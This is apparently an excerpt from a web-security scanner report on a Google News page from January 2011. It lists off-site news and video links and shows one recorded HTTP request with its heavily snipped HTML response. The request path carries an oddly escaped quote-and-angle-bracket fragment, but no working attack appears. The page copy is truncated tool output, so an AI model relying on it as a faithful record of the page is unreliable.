http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml
http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125
http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx
http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html
http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe
http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty
http://www.npr.org/templates/story/story.php?storyId=133201226
http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html
http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports
http://www.nytimes.com/2011/01/05/education/05tablets.html
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln
http://www.nytimes.com/2011/01/23/books/review/Ryerson-t.html
http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp
http://www.nytimes.com/2011/01/25/sports/football/25moments.html
http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv
http://www.oregonlive.com/pacific-northwest-news/index.ssf/2011/01/wounded_cop_was_lincoln_citys_officer_of_the_year_in_2010.html
http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html
http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines
http://www.people.com/people/package/article/0,,20395222_20459577,00.html
http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html
http://www.politico.com/news/stories/0111/48087.html
http://www.popfi.com/2011/01/25/oprahs-half-sister/
http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed
http://www.registerguard.com/csp/cms/sites/web/news/cityregion/25811732-57/police-waldport-monday-miranda-durham.csp
http://www.reuters.com/article/idUSLDE70O14P20110125
http://www.reuters.com/article/idUSN2416456020110124
http://www.reuters.com/article/idUSN2525117520110125
http://www.reuters.com/article/idUSN2525409520110125
http://www.reuters.com/article/idUSTRE70M0EM20110125
http://www.reuters.com/article/idUSTRE70N2DK20110125
http://www.reuters.com/article/idUSTRE70N2TQ20110124
http://www.reuters.com/article/idUSTRE70N73S20110124
http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&feedName=domesticNews
http://www.reuters.com/article/idUSTRE70O1MV20110125
http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&SM=1
http://www.seattlepi.com/local/6420ap_or_oregon_officer_shot.html
http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use
http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp
http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html
http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html
http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/
http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html
http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html
http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html
http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/
http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN
http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/
http://www.tvfanatic.com/2011/01/skins-review-tea/
http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm
http://www.usatoday.com/travel/destinations/2011-01-20-dominican-republic-cheap-resort_N.htm
http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm
http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html
http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html
http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012401933.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html
http://www.wdel.com/story.php?id=31917
http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension
http://www.whec.com/news/stories/S1941039.shtml?cat=566
http://www.wired.com/threatlevel/2011/01/twitter/
http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164
http://www.ynetnews.com/articles/0,7340,L-4018734,00.html
http://www.youtube.com/?hl=en&tab=n1
http://www.youtube.com/watch?v=AMxZxlkv-6o
http://www.youtube.com/watch?v=Ay5CfV-_438
http://www.youtube.com/watch?v=CWAuaVf-QPI
http://www.youtube.com/watch?v=Dye1RPvkcB0
http://www.youtube.com/watch?v=F3y6v2G97pg
http://www.youtube.com/watch?v=NJLHvIL-G4M
http://www.youtube.com/watch?v=OfNTrVD0N4c
http://www.youtube.com/watch?v=V36fQu0Vk80
http://www.youtube.com/watch?v=ZfhFBl-goZk
http://www.youtube.com/watch?v=ashZeYCLLKw
http://www.youtube.com/watch?v=bzno493XK5M
http://www.youtube.com/watch?v=eVzgsG-PBuQ
http://www.youtube.com/watch?v=pUzMhGLMFgQ
http://www.youtube.com/watch?v=z2WlJe4mlSY
http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/
http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=VwAZLhltsvBR8u6zOflKl0SDPwqi8XArv6B83B7vSRoCX_l7sUINDPf3WrszS0RjAfOY3X2gHAOhoCZIgbuZymGGQ07ZKjiBzkxKtT8dnxWnAdkfJ2q3ZlQQMVsWGSUi;Domain=.google.com;Path=/;Expires=Wed, 27-Jul-2011 14:26:06 GMT;HttpOnly
Date: Tue, 25 Jan 2011 14:26:06 GMT
Expires: Tue, 25 Jan 2011 14:26:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&topic=h&num=3&output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ss&ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=w&ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=n&ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=b&ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=t&ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=e&ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=s&ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=m&ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ir&ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/l2LZVd_dX5rO8M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNE7Vwk-Qa_sZ9z72Cn2EtSMJI2j4A " href="http://www.reuters.com/article/idUSN2525117520110125" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video: 
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/stories/2011/01/25/politics/main7280843.shtml" target="_blank" class="usg-AFQjCNHHtSqbZ3-3cRPJEgu_uvDA0zfmGg " id="MAA4AEgAUAFgAmoCdXM">Obama to Seek Balance before Divided Congress</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGUsVQVKmIv3zvO5QqlgBI0VTK7Bg " href="http://feeds.nytimes.com/click.phdo?i=c37a68a9d6c79074b075c0a6b2ae297e" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd3L_NczRkYYaSyi6l4TDxyz_MPQ " href="http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe" id="MAA4AEgAUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4X2RBdB48v8y-fxtdopp5GU1JnQ " href="http://abcnews.go.com/US/president-obama-delivers-state-union-tonight-issue-important/story?id=12747572" id="MAA4AEgAUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcxqmcTJAqTpQk5GlOyJwheNHNzA " href="http://content.usatoday.com/communities/theoval/post/2011/01/obamas-day-state-of-the-union-1/1" id="MAA4AEgAUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/pdw41_LrPaNSwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEuOgHgFhSFsE9OYmd5a2HRm0MTEA " href="http://www.bbc.co.uk/news/uk-12278369" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=bzno493XK5M">Video: 
Terror Fears: Savage explosion at Domodedovo airport shocks Russia
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://en.rian.ru/analysis/20110125/162296627.html" target="_blank" class="usg-AFQjCNHsV0WVSMU7BivakTp-qBPi9CJjwA " id="MAA4AEgBUAFgAmoCdXM">Terrorists exploit security loophole in deadly Moscow airport blast</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxTYZNqx9Pqfs5kxkoLCGrHwTuKw " href="http://www.csmonitor.com/World/terrorism-security/2011/0125/Moscow-terrorist-attack-blamed-on-airport-security-lapses" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXU8j1cMZh_AGcRx4h9byCKipUYA " href="http://abcnews.go.com/Business/wireStory?id=12755356" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEf884Is-krOtFly-f6dap_-WE5pg " href="http://www.ajc.com/business/moscow-blast-may-cause-815105.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sEKWE5k1cQjO7M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ "> msnbc.com </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJCGMec4aAF6jsyMH0o3M9k_Higg " href="http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=OfNTrVD0N4c">Video: 
Day of Rage: Fire, gunshots, clashes in Lebanon's Beirut & Tripoli
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/WORLD/meast/01/25/lebanon.protests/" target="_blank" class="usg-AFQjCNHmqKy1P9U2-7wDaUrIvCHi2wdhRQ " id="MAA4AEgCUAFgAmoCdXM">In Lebanon, angry protests as a new PM is named</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjCYyjpabgS18o8SjBBmWqCFcd7Q " href="http://online.wsj.com/article/SB10001424052748704698004576103760527993764.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZAyGwNZT-1PI-dCnKg6q2PnxPoA " href="http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGkmWfO_v_jlzuW53qVhlIG_jalMQ " href="http://www.ynetnews.com/articles/0,7340,L-4018734,00.html" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGP2Lx4HObwksI_VucgzX0JwKLidA " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706780.htm" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA " title="ESPN (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/ze_Jah1aKnczKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA "> ESPN (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF1-j7B-WS6b4KS2j6SaVujbMit3Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=NJLHvIL-G4M">Video: 
Packers Win but Bears' Cutler Grabs Headlines
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/" target="_blank" class="usg-AFQjCNFizdGGZBlsZzU4lRWmIiomju7WDQ " id="MAA4AEgDUAFgAmoCdXM">Cutler's passion questionable, not his toughness</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUrBKIcblqlwoyWEq8lYQAOjLyeA " href="http://www.wdel.com/story.php?id=31917" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE-bVr9MRWtioD4FbW9m8rRv4jKwg " href="http://www.indystar.com/article/20110125/SPORTS03/101250341/Those-who-know-Cutler-well-have-his-back-over-injury?odyssey=tab%7Cmostpopular%7Ctext%7CSPORTS" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHZToo71qS9mtu5zyHRWzSS8YWk6Q " href="http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3z0n4wX_WIMMptgoaL-KE5N0xhw " href="http://beargoggleson.com/2011/01/25/chicago-car-salesman-fired-for-wearing-packers-tie/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110125/royals-wedding-110125/" class="usg-AFQjCNEusORqqQrLSVfgI9cchB5gMfFUtw " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/iMpPYm2zLW2H9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110125/royals-wedding-110125/" class="usg-AFQjCNEusORqqQrLSVfgI9cchB5gMfFUtw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGizn8FdbrlNoarxp9b2ChITIuSnQ " href="http://www.people.com/people/package/article/0,,20395222_20459577,00.html" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://newsfeed.time.com/2011/01/25/working-girl-to-royal-housewife-kate-middleton-quits-her-day-job/" target="_blank" class="usg-AFQjCNEy23pIeiwJOGqBOnxw3QMGH9MKpg " id="MAA4AEgEUAFgAmoCdXM">Working Girl to Royal Housewife: Kate Middleton Quits Her Day Job</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFECASiQrBtdHvW_9W0yts5KDSoHA " href="http://www.dailymail.co.uk/news/article-1350151/Kate-Middleton-prepares-Royal-housewife-life-leaving-parents-business.html?ito=feeds-newsxml" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl2VrqsfwEp8U6iWvchJszI29KoA " href="http://travel.usatoday.com/destinations/dispatches/post/2011/01/london-businesses-are-pushing-royal-wedding-packages-souvenirs/139960/1" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHHos6MO-HxbA1cqVFYOczn474tAA " href="http://www.reuters.com/article/idUSTRE70N73S20110124" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw " title="Washington Post"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/zzuaChiS-OW1xM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEgD_IaVkDTWoies8fgQaFficXY0Q " href="http://msn.foxsports.com/nfl/story/Steelers-ground-Jets-head-to-Super-Bowl-XLV-80094778" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://pittsburgh.sbnation.com/pittsburgh-steelers/2011/1/25/1954878/2011-super-bowl-pittsburgh-connections-green-bay-coaching-steelers-packers" target="_blank" class="usg-AFQjCNFtPlMqUrlhqvDofcXKtm0xg2Mjtg " id="MAA4AEgFUAFgAmoCdXM">2011 Super Bowl: Pittsburgh Connections Dominate Green Bay Coaching Staff</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH-Kxlqid8b-IfRxyra4u0KauMIoA " href="http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports" id="MAA4AEgFUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIhJoynuZBqroSpyNBnpnrbmCmGQ " href="http://www.locksmithsportspicks.com/super-bowl-45-betting-odds/" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMpJiNmDogxbdBXhcsuNwAd8h8ng " href="http://www.nytimes.com/2011/01/25/sports/football/25moments.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoxIksLdOiX2EP01Fp8STAYjKlTw " href="http://www.dallasnews.com/sports/super-bowl/20110124-melded-together-steelers-fans-share-special-bond-forged-in-fire.ece" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/wxCcL8eCTK7UkM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHtiSGBKgb8AJ3pLsUWCx1en_clvQ " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706837.htm" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=z2WlJe4mlSY">Video: 
The Palestine Papers: Refugees' right of return on bargaining table
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/25/palestine-papers-refugees-south-america" target="_blank" class="usg-AFQjCNHF-80bO00nIupmnFw1092G1GWWCQ " id="MAA4AEgGUAFgAmoCdXM">Palestinians condemn US plan to settle refugees in South America</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHohl3vOEbaeeKD18YoSOK366LIZg " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12275942" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELlHb-F-z9krtQRtJ8LPf3lMtxZg " href="http://www.haaretz.com/news/diplomacy-defense/hamas-urges-palestinian-refugees-to-protest-over-concessions-on-right-of-return-1.339120" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEe7t59kCLaZEPNgdIrx-d03Dyb5w " href="http://www.jpost.com/DiplomacyAndPolitics/Article.aspx?id=205147" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
